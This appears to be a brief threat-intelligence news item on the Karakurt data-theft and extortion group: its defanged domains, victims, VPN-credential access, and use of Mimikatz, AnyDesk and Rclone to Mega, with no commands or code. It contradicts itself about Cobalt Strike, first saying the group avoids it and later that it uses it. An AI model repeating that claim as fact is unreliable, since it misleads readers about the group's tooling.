Under the self-proclaimed name Karakurt, a new financially motivated threat group has been discovered. In the third quarter, the gang began to ramp up its attacks, which continued until the fourth quarter.
Accenture researchers discovered Karakurt’s attacks after several sightings in a short period of time. Data exfiltration is the group’s primary aim, followed by extortion.
Karakurt made its initial appearance in June, when it registered its dump-site domains (karakurt[.]group and karakurt[.]tech), and it followed up in August with its Twitter handle (karakurtlair).
Between September and November, the threat group had already targeted over 40 victims in a various industries.
The group’s tactics differ depending on the victim’s environment. It frequently chooses living off-the-land approach and avoids the use of common post-exploitation tools like Cobalt Strike.
The threat group has already been linked to other cybercriminals’ attack infrastructure. However, the nature of its operations (for example, affiliate-based model or RaaS) is unknown.
The majority, 95 percent of the group’s victims were discovered in North America, while the rest were found in Europe. The group does not target a specific industry and instead targets at random.
For obtaining initial access, the Karakurt group primarily uses VPN credentials obtained from sellers or phishing.
For persistence, the group employs Cobalt Strike, which has recently been replaced by AnyDesk in recent attacks. They also use Mimikatz to steal administrators’ credentials for privilege escalation.
To steal data, the group compresses files using genuine data compression tools such as 7zip and WinZip and then sends all data to Mega[.]io using Rclone/FileZilla.
The Karakurt hacking group focuses on encryption-less attacks that appear to be less harmful than ransomware. Threatening victims for releasing sensitive data, on the other hand, is equally dangerous. Hence, businesses should concentrate on defense, prevention, and detection of such threats.